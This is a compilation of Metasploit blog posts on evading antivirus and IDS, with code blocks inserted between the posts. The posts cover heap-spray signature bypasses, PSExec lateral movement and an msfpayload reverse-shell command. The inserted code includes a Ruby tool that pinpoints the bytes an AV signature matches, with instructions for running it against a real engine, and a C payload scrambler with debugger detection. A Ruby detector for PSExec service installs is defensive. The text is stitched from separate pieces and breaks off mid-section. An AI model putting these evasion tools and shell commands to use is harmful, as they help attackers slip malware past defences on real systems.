However, a wise man once said, "If you know your enemies and know yourself, you will not be imperiled in a hundred battles; if you do not know your enemies but do know yourself, you will win one and lose one; if you do not know your enemies nor yourself, you will be imperiled in every single battle." So as an attacker, it's rather important to understand your own strength. You probably also just noticed I said "evasion techniques you've made PUBLIC," because the truth is, attacks should be made to be felt, not seen (my Yoda moment). And this also brings up the "secret" rule about Fight Club: "The first rule of Fight Club is you do NOT talk about Fight Club." You see, my man Tyler Durden just schooled you about cyber wars. But hey, we are Metasploit, so it's our job to keep everything as frank and open as possible. We are the opposite of Fight Club.

Let There be Light

Despite all the wonderful countermeasures AVs offer, they are still made by humans. What tends to happen is that AVs will only do just enough to make sure a malicious code is detectable. I can't speak for ALL antivirus out there (again, time and resources), but generally speaking these tend to be the places AVs look at in a browser exploit, because they're commonly seen, and I'll try to briefly explain each:
- Heap spray routine
- Trigger for the vulnerability
- Payload

Heap Spray That Gets Flagged

Often browser exploits take advantage of some sort of memory corruption, for example a heap-based overflow or a use-after-free. The "heap spray" exploitation technique is used to prepare a specific memory layout to place the payload at a predictable address, and/or to leverage an information leak that allows the exploit to read something in memory. There are plenty of ways a heap spray can be done: with images, with Javascript, ActionScript, or whatever. As long as something allocates memory on the heap (with user-controlled size and data), it is a good candidate for heap spraying.
A typical spray looks something like this: a loop that repeatedly concatenates a block of NOP-like padding and the shellcode into one large string, then stores hundreds of copies of that string in an array so that the heap fills with predictable content. For a quick demonstration, I saved such a Javascript snippet as i_am_harmless.html, and then uploaded it to VirusTotal. I got flagged, ain't no thing. What actually gets flagged in the code is kind of product-specific, but I'll pick Avast as an example because this is a pretty popular product. To find the specific lines that get flagged, we can use the "dsplit" technique. Basically this is a tool that splits data into chunks, and then you let the AV scan these chunks to identify which ones get flagged; whatever gets flagged is where the AV signature looks, and that's what you should modify. You can use the same concept to find signatures for browser exploits. For Avast (and apparently McAfee picks this up too), the signature specifically matches two lines of the above Javascript. How difficult is it to make two lines undetectable, right? After rewriting those two lines, the code is no longer flagged by any of the AVs. It's a very basic example of how exploits can bypass AVs, but should be enough to make a point.

However, not all memory corruption based exploits need heap spraying. In the case of a use-after-free, if you have precise control of the memory release and the invalid use, you don't have to spray... well, at least no more than 18 + 1 times: 18 consecutive allocations to make sure the Low Fragmentation Heap is enabled for a specific allocation size, and 1 to actually overwrite the freed memory right after the free happens. Stuff like this is still pretty hard to detect. Here's an example (i_am_kinda_harmless.html), built from a function lfh(), a function overwrite(), and a main() that calls them in order. The code would look malicious in the eyes of an exploit developer, but not to an antivirus. In case you're wondering why this would be malicious, it's because: in function lfh(), the image object creates a specific size on the heap, and then the appendChild() calls in the loop keep these allocations alive.
In function overwrite(), when you assign something to the className property, you also trigger a heap allocation. If you're really curious, you can read the tutorial on "DOM Element Property Spray" by Peter Van Eeckhoutte; it is the same idea (and even the same call stack). When you put these routines in the right order (see the main() function), the malicious intent stands out. It's pretty difficult for AVs to catch this behavior, so you'd kind of have to hope they catch something else in the code, like the trigger.

Trigger That Gets Flagged

A "trigger" is code that triggers the vulnerability, which implies triggers are bug-specific. There are a few ways your trigger wouldn't be detected:
- It's a 0day; there is no perfect and universal solution to find them all.
- There is more than one way to trigger the bug. For example, use-after-frees are commonly triggered by one or more event handlers; sometimes one is flagged but you still have other options available. The same goes for how you create an object, how you free it, etc.
- Obfuscation. Modify a few keywords, and then you're done. This is so ridiculously easy, I'll use this one as an example.

The following example is part of MS12-063 (the execCommand use-after-free). Originally I was testing against G DATA, and at the time (almost a year ago) it flagged a specific snippet of the exploit's trigger code. G DATA actually wasn't the only one flagging this code; others like Ad-Aware, BitDefender, Emsisoft, F-Secure, MicroWorld-eScan and nProtect also flagged it as an exploit. Are you ready to know how to bypass this? The bypass is nothing more than renaming a few keywords in that snippet, after which nobody picks it up again.

Payload That Gets Flagged

One thing you should know about browser exploit payloads getting flagged is that, well, most of the time they're not flagged :-) So this makes things a lot easier for us.
Metasploit browser exploits are already using payloads that are encoded with x86/shikata_ga_nai in Javascript format (little endian), which is the equivalent of the following command:

    msfpayload windows/meterpreter/reverse_tcp lhost=[IP] lport=[PORT] R | msfencode -t js_le

When I uploaded the Javascript-based payload to VirusTotal, only two products picked it up. It's pretty easy to get around these two with the Rex::Exploitation::JSObfu API in Metasploit. The lazy me did something like this during the experiment (the JSObfu object has to be kept in a variable so it can be obfuscated and then printed):

    msf > irb
    [*] Starting IRB shell...
    >> p = %Q| YOUR JAVASCRIPT PAYLOAD |
    >> js = Rex::Exploitation::JSObfu.new(p)
    >> js.obfuscate
    >> puts js
    ... The obfuscated output will be generated ...

And the obfuscated version bypassed both of them (Microsoft and Norman).

There's a little bit more to how AVs detect browser exploits. Another thing we haven't covered is the use of browser extensions to detect malicious pages in real time. There are also ways around them, but perhaps we'll share that experience with you next time.

The moral of the story is that, as you can see, AV evasion is a never-ending game. If you're the user type, personally my take is it never hurts to learn how to code a little bit in your spare time, and modify a few lines of code in the exploit to get things running smoothly when the time comes. And I promise you, it will come. After all, a tool is only as good as the skills of the craftsman/woman using it. If you are the developer type, now that you're more knowledgeable about this cat and mouse game than ever, it is up to you to decide which side you want to contribute to (offensive or defensive), and make the world a little better.
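The dsplit technique from the heap spray section above, as an added example in Ruby (not code from the post or from Metasploit). A real run writes each candidate slice to disk and lets the AV engine scan it; here the engine is replaced by a block that answers whether a byte string would be flagged. The Javascript fragment and the content signature that matches it are constructed for the example and are not any vendor's real rule. It goes a step beyond plain fixed-size chunking by binary-searching the prefix and suffix lengths, which returns the exact flagged span in a handful of scans instead of one scan per chunk.

```ruby
# Added example, not from the post or from Metasploit: locate the bytes an AV
# content signature matches, following the dsplit idea. A real workflow writes
# each candidate slice to disk and lets the AV engine scan it; here the engine
# is a block that returns true when the bytes would be flagged.

# Smallest prefix length of `data` that is still flagged, or nil if the whole
# file is clean. Content signatures are monotone (any slice containing the
# matched bytes is still flagged), so a binary search over the prefix length
# finds the end of the signature in log2(n) scans instead of n / chunk_size.
def flagged_end(data, &scanner)
  return nil unless scanner.call(data)
  lo = 1
  hi = data.bytesize # invariant: data[0, hi] is flagged
  while lo < hi
    mid = (lo + hi) / 2
    if scanner.call(data.byteslice(0, mid))
      hi = mid
    else
      lo = mid + 1
    end
  end
  hi
end

# Largest start offset such that data[start...stop] is still flagged.
def flagged_start(data, stop, &scanner)
  lo = 0 # invariant: data[lo...stop] is flagged
  hi = stop - 1
  while lo < hi
    mid = (lo + hi + 1) / 2
    if scanner.call(data.byteslice(mid, stop - mid))
      lo = mid
    else
      hi = mid - 1
    end
  end
  lo
end

# Returns [offset, flagged_bytes] for the minimal span the scanner still flags,
# or nil when the data is clean. That span is what you need to rewrite.
def locate_signature(data, &scanner)
  stop = flagged_end(data, &scanner)
  return nil if stop.nil?
  start = flagged_start(data, stop, &scanner)
  [start, data.byteslice(start, stop - start)]
end

# Constructed sample: a heap-spray-style Javascript fragment. The "engine" is a
# constructed content signature on the string-doubling idiom; it is not any
# vendor's real signature.
SAMPLE_JS = <<~JS
  var shellcode = unescape("%u4141%u4141");
  var nops = unescape("%u9090%u9090");
  while (nops.length < 0x100000) nops += nops;
  var spray = [];
  for (var i = 0; i < 200; i++) spray[i] = nops + shellcode;
JS

FAKE_AV = ->(bytes) { bytes.include?("nops += nops") }

if __FILE__ == $PROGRAM_NAME
  offset, sig = locate_signature(SAMPLE_JS, &FAKE_AV)
  puts "flagged #{sig.bytesize} bytes at offset #{offset}: #{sig.inspect}"
  # Renaming the variable is the two-line fix the post describes: same spray,
  # no match.
  puts "after renaming: #{locate_signature(SAMPLE_JS.gsub('nops', 'pad'), &FAKE_AV).inspect}"
end
```

To use it against a real engine, replace FAKE_AV with a lambda that writes its argument to a temporary file and returns whether a command-line scan of that file reports a detection. The binary search assumes a plain content signature; a heuristic that fires on the combination of several distant fragments breaks the monotonicity assumption, in which case fall back to scanning fixed-size chunks as dsplit does.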

PSExec Demystified

Multiple modules inside the Metasploit Framework bear the title PSExec, which may be confusing to some users. When someone simply refers to "the PSExec module", they typically mean exploit/windows/smb/psexec, the original PSExec module. Other modules are more recent additions, and make use of the PSExec technique in other ways. Here's a quick overview of what these modules are for:

exploit/windows/smb/psexec
  Purpose: Evading anti-virus detection
  Comment: The service EXE is now getting caught by most AV vendors. Use custom templates or the MOF upload method to circumvent AV detection.

exploit/windows/local/current_user_psexec
  Purpose: Local exploit run on a compromised local administrator's machine, with the goal of obtaining a session on a domain controller
  Comment: Great starting point to take over an entire network. The attack is less likely to get noticed because it uses legitimate access methods.

auxiliary/admin/smb/psexec_command
  Purpose: Run arbitrary commands on the target without uploading payloads
  Comment: Unlikely to be detected by AV, but limited because you can only send one command, not obtain a session.

auxiliary/scanner/smb/psexec_loggedin_users
  Purpose: Get the list of currently logged in users
  Comment: Run this module against all targets to get tons of information on your targets.

We'll now look at each one in detail below. First, let's talk about what PSExec is, and where the idea comes from.

The PSExec Utility

The name PSExec comes from a program by the same name. Mark Russinovich wrote this utility as part of his Sysinternals suite in the late 90s to help Windows administrators perform important tasks, for example to execute commands or run executables on remote systems. The PSExec utility requires a few things on the remote system:
- the Server Message Block (SMB) service must be available and reachable (e.g. not blocked by a firewall);
- File and Print Sharing must be enabled, and Simple File Sharing must be disabled;
- the Admin$ share must be available and accessible.
It is a hidden SMB share that maps to the Windows directory and is intended for software deployments. The credentials supplied to the PSExec utility must have permission to access the Admin$ share.

PSExec has a Windows service image inside of its executable. It takes this service and deploys it to the Admin$ share on the remote machine. It then uses the DCE/RPC interface over SMB to access the Windows Service Control Manager API and starts the PSExec service on the remote machine. The PSExec service then creates a named pipe that can be used to send commands to the system.

The PSExec Exploit (exploit/windows/smb/psexec)

The PSExec exploit module in Metasploit runs on the same basic principle as the PSExec utility. It can behave in several ways, many of them unknown to most users.

The Service EXE

In this method, the exploit generates and embeds a payload into an executable that is a Windows service image, much like the service the PSExec utility deploys. The exploit then uploads the service executable to the Admin$ share using the supplied credentials, connects to the DCE/RPC interface, and calls into the Service Control Manager, telling SCM to start the service that we deployed to Admin$ earlier. When the service is started, it starts a new rundll32.exe process, allocates executable memory inside that process and copies the shellcode into it. It then calls the starting address of that memory location as if it were a function pointer, executing the stored shellcode.

The service EXE is generated using an executable template with a placeholder where the shellcode is inserted. The default executable templates in Metasploit Framework are flagged by major AV solutions because most anti-virus vendors have signatures for detecting these templates. No matter what payload you stick in this executable template, it will get flagged by AV.

AV Evasion

The PSExec exploit has several advanced options.
The first are the options to supply alternative executable templates. There are two separate options: one is set EXE::Path, which tells Metasploit to look in a different directory for the executable templates; the other is set EXE::Template, which is the name of the executable template file to use. If you create an executable template and store it in a different directory, you will need to set both of these options. Writing a custom executable template is a good way to avoid AV detection. If you write your own EXE template for the PSExec exploit, it must be a Windows service image.

In addition to writing a custom executable template, you can write an entire executable on your own. This means that a Metasploit payload will not actually get inserted; you will code the entire behavior into the EXE itself. The psexec exploit module will then upload the EXE and try to start it via SCM.

Tip: If you would like to save time evading anti-virus, you can use the dynamic executable option in Metasploit Pro, which generates random executable files each time that are much less likely to be detected by anti-virus. (Watch my webcast Evading Anti-virus Detection with Metasploit for more info.)

The Managed Object Format (MOF) upload method

MOF files are a part of Windows Management Instrumentation (WMI). They are Managed Object Format files: they contain WMI class definitions and instructions. MOF files must be compiled to work properly; however, there is a way around that on Windows XP. In Windows XP, if you drop an uncompiled MOF file in the system32\wbem\mof\ directory, Windows XP will compile the MOF for you and run it. The PSExec exploit has a method for using this to our advantage. If you set MOF_UPLOAD_METHOD to true, it will do a few things differently. Our payload EXE will be generated as a normal EXE instead of a service EXE.
It will then upload it via Admin$ as expected before generating a MOF file that will execute the EXE we uploaded. It will use Admin$ to deploy the MOF file to the MOF directory. Windows XP will then compile and run the MOF, causing our payload EXE to be executed. The MOF method can be combined with the custom EXE or custom template methods described above to try and evade AV as well. The MOF method currently only works on Windows XP, as later versions require the MOF to already be compiled in order for them to run.

The PSExec Current User Local Exploit (exploit/windows/local/current_user_psexec)

The Current User PSExec module is a local exploit. This means it is an exploit run on an already established session. Let's set up a scenario to explain how this works. In our scenario you do the following:
- Set up a browser exploit at some address.
- Trick a local system administrator into visiting the site.
- Get a reverse Meterpreter shell inside the administrator's browser process.
- Run netstat to see if the administrator is connected to one of the domain controllers.

So now Meterpreter is running on a system administrator's box under her user context. While there may not be something you're interested in on her workstation, she has permission to access a domain controller (DC), which you would like to shell. You don't have her credentials, and you cannot talk directly to the DC from your box.

This is where the current_user_psexec module comes in. This local exploit works the same way as the psexec exploit. However, it runs from the victim machine, and you do not supply any credentials. This exploit takes the authentication token from the user context and passes that along. This means you can get a shell on any box the user can connect to from that machine and has permissions on, without actually knowing what their credentials are.

This is an invaluable technique to have in your toolbox. From that first machine you can compromise numerous other machines.
You can do this without having set up any proxy or VPN pivots, and you will have done it using legitimate means of access.

The PSExec Command Execution Module (auxiliary/admin/smb/psexec_command)

Submitted by community contributor Royce @R3dy__ Davis, this module expands upon the usefulness of the PSExec behavior. It utilizes the same basic technique but does not upload any binaries. Instead it issues a single Windows command to the system, which is then run by the remote system. This allows arbitrary commands to be executed on the remote system without sending any payloads that could be detected by AV. While it does not get you a shell, it will allow you to perform specific one-off actions on the system that you may need.

The PSExec Logged In Users Module (auxiliary/scanner/smb/psexec_loggedin_users)

Also brought to you by Royce @R3dy__ Davis, this module is a specialized version of the command execution one. It uses the same technique to specifically query the registry on the remote machine and get a list of all currently logged on users. It is a scanner module, which means it can also run against numerous hosts simultaneously, quickly getting the information from all the targeted hosts.

Summary

What we've seen here is that the PSExec technique is actually a relatively simple mechanism with immense benefit. We should all remember to thank Mark Russinovich for this wonderful gift he has given us. As time goes by, people will find many more uses for this same technique, and there is room for improvement in how these modules work and interact. The PSExec exploits are two of the most useful, and most reliable, techniques for getting shells in the entire Metasploit Framework.

[ETA] If you're looking for more information on PSExec, there's more in the Whiteboard Wednesday video "How PSExec and Remote Execution Work".
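The defender's side of the service-EXE technique described above, as an added example in Ruby (not code from the post or from Metasploit). Whether the image is the Sysinternals PSEXESVC, a Metasploit template EXE or a hand-written service, every variant that deploys a service ends with the Service Control Manager installing and starting a new service whose image was just dropped into the Windows directory that Admin$ maps to, and Windows records that as System log Event ID 7045 ("A service was installed in the system"). The log lines are constructed in a flat key=value form for the example, the allowlist is constructed, and the random-name heuristic is an assumption about what the default service names look like, not a rule taken from the module.

```ruby
# Added example, not from the post or from Metasploit: a detection pass over
# Event ID 7045 service-install records, looking for the service image that a
# PSExec-style run drops into the Windows directory via ADMIN$. The log lines
# are constructed in key=value form; a real pipeline would read the event's
# fields (Service Name, Service File Name, Service Account, Start Type).
require 'set'

# Constructed allowlist of service images an organisation expects to see.
KNOWN_SERVICE_IMAGES = Set[
  'c:\\windows\\system32\\svchost.exe',
  'c:\\program files\\backupagent\\agent.exe',
]

Event = Struct.new(:host, :service, :image, :account, :start, :reasons)

# Parse one constructed line, e.g.
#   host=ws02 eid=7045 service=mLkQrTzB image="%SystemRoot%\oRpEhYxK.exe" account=LocalSystem start=demand
# Returns nil for anything that is not a 7045 service-install event.
def parse_event(line)
  fields = line.scan(/(\w+)=("[^"]*"|\S+)/).to_h { |k, v| [k, v.delete('"')] }
  return nil unless fields['eid'] == '7045'
  Event.new(fields['host'], fields['service'], fields['image'],
            fields['account'], fields['start'], [])
end

# %SystemRoot% and the legacy WinNT name both mean the directory ADMIN$ exposes.
def normalize_path(path)
  path.downcase.sub('%systemroot%', 'c:\\windows').sub('c:\\winnt', 'c:\\windows')
end

# True when the image sits directly in the Windows directory (no subdirectory),
# which is where an upload through ADMIN$ lands.
def dropped_in_windows_root?(path)
  rest = path.delete_prefix('c:\\windows\\')
  rest != path && !rest.include?('\\') && rest.end_with?('.exe')
end

# Weak, assumed heuristic for machine-generated names: purely alphabetic with
# several lower-to-upper case flips. Expect false positives; it only adds a
# reason, it never flags on its own.
def random_looking?(name)
  name.match?(/\A[a-z]{6,16}\z/i) && name.scan(/[a-z][A-Z]/).size >= 2
end

def analyze(event)
  path = normalize_path(event.image)
  event.reasons << 'Sysinternals PsExec service (PSEXESVC)' if path.end_with?('\\psexesvc.exe')
  if dropped_in_windows_root?(path) && !KNOWN_SERVICE_IMAGES.include?(path)
    event.reasons << 'service image dropped directly in the Windows directory (ADMIN$ root)'
  end
  event.reasons << 'random-looking service name' if random_looking?(event.service)
  event
end

# Returns the 7045 events that tripped at least one heuristic, in log order.
def suspicious_service_installs(lines)
  lines.map { |l| parse_event(l) }.compact.map { |e| analyze(e) }.select { |e| e.reasons.any? }
end

# Constructed sample log: a Sysinternals PsExec run, a Metasploit-style run with
# a random service and image name, a normal software install, and an unrelated
# service state change (Event ID 7036).
SAMPLE_LOG = <<~'LOG'
  host=ws01 eid=7045 service=PSEXESVC image="%SystemRoot%\PSEXESVC.exe" account=LocalSystem start=demand
  host=ws02 eid=7045 service=mLkQrTzB image="%SystemRoot%\oRpEhYxK.exe" account=LocalSystem start=demand
  host=ws03 eid=7045 service=BackupAgent image="C:\Program Files\BackupAgent\agent.exe" account=LocalSystem start=auto
  host=ws03 eid=7036 service=BackupAgent state=running
LOG

if __FILE__ == $PROGRAM_NAME
  suspicious_service_installs(SAMPLE_LOG.lines).each do |e|
    puts "#{e.host}: service #{e.service} (#{e.image}) -> #{e.reasons.join('; ')}"
  end
end
```

The strongest signal is the image path: a service EXE sitting in the root of the Windows directory, outside the allowlist, is exactly the artifact that a custom template or a hand-written EXE cannot hide, however well it evades AV. The psexec_command and current_user_psexec variants produce the same 7045 record, so the rule covers them too; only the MOF upload method avoids it, and that one leaves a file in system32\wbem\mof\ instead.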

Evading Anti-Virus Detection - Whiteboard Wednesday

In today's Whiteboard Wednesday, David Maloney explains anti-virus evasion techniques for Metasploit. In order to make the most of Metasploit pen testing techniques in delivering payloads, you need to be able to deliver those payloads without anti-virus flagging them. David walks us through a few examples of how to bypass anti-virus detection so you can easily pen test your systems. Watch the video here!

Interested in some more information? Make sure to read David's blog post on the topic, and be sure to register for next week's webcast, where David will present a deep dive on how to best evade AV with Metasploit. Make sure to check in next week for our next episode of Whiteboard Wednesday.

The Odd Couple: Metasploit and Antivirus Solutions

I hear a lot of questions concerning antivirus evasion with Metasploit, so I'd like to share some of the information critical to understanding this problem. This blog post is not designed to give you surefire antivirus (AV) evasion techniques, but rather to help you understand the fundamentals of the issue.

A Quick Glossary

Before we begin, let's define a few terms. This will be important for understanding some of the things we will discuss.

Payload: A payload is the actual code that is being delivered to a victim by an exploit.

Signature: In the antivirus world, signatures are the most basic form of detection. A signature is a set of rules or a pattern matched against code. Signatures are based on known examples of malicious code. For a real life analogy, think of those artist's sketches the police put on the news when they are looking for a criminal. They are meant to convey enough detail so that people can easily recognize someone who is known to be dangerous.

Heuristics: Heuristics are the attempt to identify malicious code by matching specific behavior instead of exact patterns in that code. The engine watches the way the code runs, and determines dangerous behavior based on more complex sets of rules.

Sandbox: AV sandboxes are protected segments in the operating system where code can be run safely. The sandbox prevents that code from harming important parts of the OS. AV can run suspicious code in a sandbox while it uses heuristic detection to determine if it's safe. Because these sandboxes could seriously slow down operation of the system, the sandbox usually only runs for a brief period and then releases the code if nothing malicious is detected.

Payloads

The first thing we need to understand is how payloads work in Metasploit.
When talking about payloads, there are two different kinds of payload we need to understand.

Singles: A single payload is a piece of standalone shellcode that is generated in one step and that performs a single discrete task, for example the Windows Add User payload.

Staged: Staged payloads are componentized payloads, which are used to get larger, more complex payloads to the target when there isn't enough space in the exploit. Staged payloads are broken down into stages, hence the name.

Stage 1: Also known as "the stager", this is a relatively small bit of shellcode that opens a communication channel back to a payload handler running in Metasploit. The handler then sends the stager the next stage of the payload, which is placed into memory and executed. Examples of stagers include bind_tcp, reverse_tcp, reverse_http, and reverse_https, among others.

Stage 2: This is what will actually be setting up our payload to run in memory. In the case of Meterpreter, this will load the basic Meterpreter skeleton into memory, which then downloads the Meterpreter libraries and extensions from Metasploit.

Many times when people say that AV is catching Meterpreter, it is actually the stager that is getting flagged. These stagers are fairly recognizable, and are the easiest path for AV to try and block our payloads.

Executable Templates

In many scenarios, the exploit directly writes the stager into the memory of the application being exploited. However, in some cases Metasploit has to deliver payloads through vulnerabilities other than memory corruption. This is where executable templates come in handy. We cannot simply write a blob of shellcode to the machine and expect it to execute; we need a properly formatted executable file that will handle this for us.

An executable template is primarily responsible for one job: it grabs space in memory, writes the stager shellcode (or a single payload) into that space, and executes it.
These executable templates come in many flavors, but PE/COFF (Windows executable) and ELF binaries are the most common.

When an executable payload is generated in Metasploit as part of an exploit, or generated through something like msfvenom, a set of default templates is used. Most of the AV vendors have added static signatures for these default templates. These signatures don't even look for a payload; they just look for the executable template. When one of these empty templates is uploaded to VirusTotal, there is nothing actually malicious in that executable, but 33 different AV products pick it up. This is a lazy but effective technique on the AV vendors' part. Since they know a lot of Metasploit payloads will be wrapped in these specific binaries, they create some static signatures and then go on to other things.

How do we get around this issue? Well, the most obvious answer is to use a different executable template. When using an exploit that leverages an executable payload, there are advanced options available for the use of custom templates. To see this, select the psexec module and run 'show advanced'; the template options are listed under the advanced options.

There are a lot of different considerations when selecting an executable template. You could try to use an existing executable that is known to be safe, and try to hide your payload there; some of the advanced options do exactly that. For more information on this approach, I also highly recommend Chris Gates' blog post: Carnal0wnage; Attack Research Blog: Msfencode a Msfpayload Into An Existing Executable. You could also write and compile your own template, enabling you to do all sorts of complex and dirty tricks in your template.
We'll talk a little more on this later on when we discuss the dynamic executable option available in Metasploit Pro.

The Encoder Myth

Many users seem to be confused about what encoders are for: "AV keeps picking up my payload no matter what encoder I try." Encoders are not meant to evade AV but to handle bad characters. When dealing with memory corruption exploits, some characters may break your exploit. In most cases, a null byte anywhere in the payload will cause it to fail. Depending on the protocol, other characters may cause unintended results; common characters for this are space, tab, carriage return, and line feed, among others.

Encoders are designed to modify the payload so that it will work for a given exploit, avoiding a known set of bad characters and size limitations. There are many different ways we can go about this.

Newer, more advanced encoders actually use a rolling XOR encoding to create polymorphic code. The encoder uses a rolling XOR on the payload, creating an encoded data stream, and then prepends a decoder stub to it. When the payload is delivered, the decoder stub runs first, decoding the payload back into executable shellcode in memory. The payload is unrecognizable until it runs. This has, in the past, created the unintended side effect of helping to evade antivirus, and is probably responsible for the creation of the Encoder Myth.

However, any decent heuristic detection inside AV will not be fooled by this simple obfuscation. Furthermore, the decoder stub itself tends to be fairly recognizable and can be caught with signature-based detection.

Another way to evade AV is through the creation of new polymorphic encoders, obfuscating the code and creating currently unrecognized decoder stubs.
This is a stopgap measure, as AV eventually creates signatures for the new decoder stubs, and it is still not particularly effective against heuristic detection.

Dynamic Executable Templates in Metasploit Pro

Starting with version 4.4, Metasploit Pro offers the option to dynamically generate executable templates when using the psexec module. It can be selected from Advanced Options when running the PSExec module, or from Payload Settings in the Bruteforcer when selecting SMB. (Screenshots: The Dynamic EXE Option for PSExec; Dynamic EXE Option in the Bruteforcer.)

A dynamic EXE can also be generated manually using the exploits/pro/windows/dynamic_exe module. This will generate a dynamic EXE on Metasploit Pro's local file system. The payload can then be delivered by various out-of-band methods.

The purpose of the dynamic executable generator is to avoid AV detection. It generates the C code for the executable template, and includes the payload directly, instead of injecting it after the template has been generated. The C code is written in a random, on-the-fly fashion and compiled with Metasm. It uses several techniques to try and evade AV.

Dynamic Nature

The code is completely different every time it is generated, using randomized, procedurally created C functions, which are then assembled into randomized call trees. This means that the code is different every time, and the execution flow doesn't fall into any predictable patterns either. Metasploit Pro initializes random variables and scrambles them with other, required variables so that the significant variables are never mapped to the same place in memory. The actual functions are different every time, the execution flow is different every time, and the memory layout is different every time. This makes it virtually impossible for AV vendors to create a static signature for detection of these payloads. You could say we are exploiting the fundamental flaw of signature-based detection.
The amount of work needed to maintain signatures becomes overwhelming, and the signatures are quickly outdated.

Appear harmless

The randomly generated C functions also fill the call tree with completely harmless, innocuous operations, which is especially important for sandboxing. As you already know, sandboxes run for a limited time and eventually release the sample. By performing only legitimate actions during that time, we leave the sandbox no choice but to release our executable, at which point we can safely execute the actual payload.

Hide the payload

You are probably tired of seeing the word random, but here we go again: Metasploit Pro randomizes its payload in memory. The payload is read into memory completely scrambled, and is unscrambled only right before it is executed. The scrambling is randomized on each run, making it very hard to detect the payload sitting in memory.

Detect debuggers

Just as it tries to defeat AV, the code can detect debuggers and stop any malicious activity, making reverse engineering of the payload much more difficult (though far from impossible).

Dynamic run-time linking

Antivirus solutions also often look at the import table of the executable. Metasploit Pro evades this through dynamic run-time linking of all required functions, keeping the import table almost completely empty. It also makes it harder to recognize which functions the code actually calls.

These methods make life difficult, though not impossible, for reverse engineers and antivirus solutions analyzing Metasploit payloads. Metasploit does still get caught by some AV solutions, with detection rates varying from run to run. Antivirus evasion is never done. We will never be satisfied with what we've achieved. Watch this space for updates on the arms race. We intend to work hard to stay a few steps ahead.

Further Reading

This has been a quick, high-level overview of some of the concepts.
For more detailed work, check out some of these links:
Why Encoding Does not Matter and How Metasploit Generates EXEs (Thoughts on Security)
Facts and myths about antivirus evasion with Metasploit (Pentest Geek)
Using Metasm To Avoid Antivirus Detection (Ghost Writing ASM)
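The “Hide the payload” and “Detect debuggers” techniques described above, as an added example that is not Metasploit Pro's generated template code (which is not reproduced here): the payload is stored as a seed-driven byte permutation and is only put back in order at the moment it is needed, and the stub refuses to reconstruct it if a debugger is attached. Assumptions: a fixed BUILD_SEED stands in for the per-build random seed a generator would draw, the payload is constructed placeholder bytes rather than shellcode, and the debugger check is IsDebuggerPresent() on Windows and the TracerPid field of /proc/self/status on Linux (0 is returned on other platforms).

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#ifdef _WIN32
#include <windows.h>
#endif

#define MAX_PAYLOAD 256

/* Constructed placeholder standing in for a stager; not real shellcode. */
const uint8_t PLAIN_PAYLOAD[] = "stage-2 placeholder payload bytes";
/* Assumed per-build seed: a generator would draw a fresh one for every EXE. */
const uint32_t BUILD_SEED = 0x5eed1234u;

/* Small LCG so generator and stub derive the same permutation from the seed. */
static uint32_t lcg_next(uint32_t *s) {
    *s = *s * 1664525u + 1013904223u;
    return *s >> 8;
}

/* Fisher-Yates shuffle of the indices 0..n-1, driven entirely by the seed. */
static void build_permutation(uint32_t seed, size_t *perm, size_t n) {
    for (size_t i = 0; i < n; i++) perm[i] = i;
    for (size_t i = n - 1; i > 0; i--) {
        size_t j = (size_t)(lcg_next(&seed) % (uint32_t)(i + 1));
        size_t t = perm[i]; perm[i] = perm[j]; perm[j] = t;
    }
}

/* Generator side: byte i of the payload is stored at position perm[i]. */
int scramble(const uint8_t *in, size_t n, uint32_t seed, uint8_t *out) {
    size_t perm[MAX_PAYLOAD];
    if (n == 0 || n > MAX_PAYLOAD) return 0;
    build_permutation(seed, perm, n);
    for (size_t i = 0; i < n; i++) out[perm[i]] = in[i];
    return 1;
}

/* Stub side: rebuild the same permutation and pull the bytes back into order. */
int unscramble(const uint8_t *in, size_t n, uint32_t seed, uint8_t *out) {
    size_t perm[MAX_PAYLOAD];
    if (n == 0 || n > MAX_PAYLOAD) return 0;
    build_permutation(seed, perm, n);
    for (size_t i = 0; i < n; i++) out[i] = in[perm[i]];
    return 1;
}

/* 1 if a debugger is attached. Windows: IsDebuggerPresent(). Linux: a
 * non-zero TracerPid in /proc/self/status. Elsewhere: assume not traced. */
int debugger_present(void) {
#ifdef _WIN32
    return IsDebuggerPresent() ? 1 : 0;
#else
    char line[256];
    int traced = 0;
    FILE *f = fopen("/proc/self/status", "r");
    if (!f) return 0;
    while (fgets(line, sizeof line, f)) {
        if (strncmp(line, "TracerPid:", 10) == 0) {
            traced = atoi(line + 10) != 0;
            break;
        }
    }
    fclose(f);
    return traced;
#endif
}

/* Stub entry point: the bytes stay scrambled until this runs, and it stays
 * quiet under a debugger. Returns bytes recovered, or 0 when it refused. */
size_t stage_payload(const uint8_t *scrambled, size_t n, uint32_t seed, uint8_t *out) {
    if (debugger_present()) return 0;
    if (!unscramble(scrambled, n, seed, out)) return 0;
    return n;
}

/* Self-check: scramble, unscramble, compare against the original bytes. */
int roundtrip_demo(void) {
    uint8_t scrambled[MAX_PAYLOAD], recovered[MAX_PAYLOAD];
    size_t n = sizeof PLAIN_PAYLOAD - 1;   /* drop the string's NUL */
    if (!scramble(PLAIN_PAYLOAD, n, BUILD_SEED, scrambled)) return 0;
    if (!unscramble(scrambled, n, BUILD_SEED, recovered)) return 0;
    return memcmp(recovered, PLAIN_PAYLOAD, n) == 0;
}

int main(void) {
    uint8_t scrambled[MAX_PAYLOAD], out[MAX_PAYLOAD];
    size_t n = sizeof PLAIN_PAYLOAD - 1;
    scramble(PLAIN_PAYLOAD, n, BUILD_SEED, scrambled);          /* generator */
    size_t got = stage_payload(scrambled, n, BUILD_SEED, out);  /* stub */
    if (got == 0) { puts("debugger detected, staying quiet"); return 1; }
    printf("round trip ok: %d\n", roundtrip_demo());
    printf("recovered %zu bytes: %.*s\n", got, (int)got, (const char *)out);
    return 0;
}
```

A permutation alone preserves the byte histogram of the payload, so a scanner that counts bytes in memory still sees the same distribution; a generator would combine it with a value-level transform such as the rolling XOR shown earlier. The TracerPid check is also trivially bypassed by a debugger that hides itself or by patching the comparison, which is why the post calls reverse engineering harder but far from impossible.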

How to Fly Under the Radar of AV and IPS with Metasploit's Stealth Features


When conducting a penetration testing assignment, one objective may be to get into the network without tripping any of the alarms, such as IDS/IPS or anti-virus. Enterprises typically add this to the requirements to test whether their defenses are good enough to detect an advanced attacker. Here's how you can make sure you can sneak in and out without "getting caught".

Scan speed

First of all, bear in mind that you'll want to slow down your initial network scan so you don't raise suspicion by creating heavy network traffic. In the Advanced Settings of the Discovery Scan, set your network scanning speed to Sneaky or Paranoid. This feature is included in Metasploit Community Edition, Metasploit Express, and Metasploit Pro.

Evading IDS/IPS

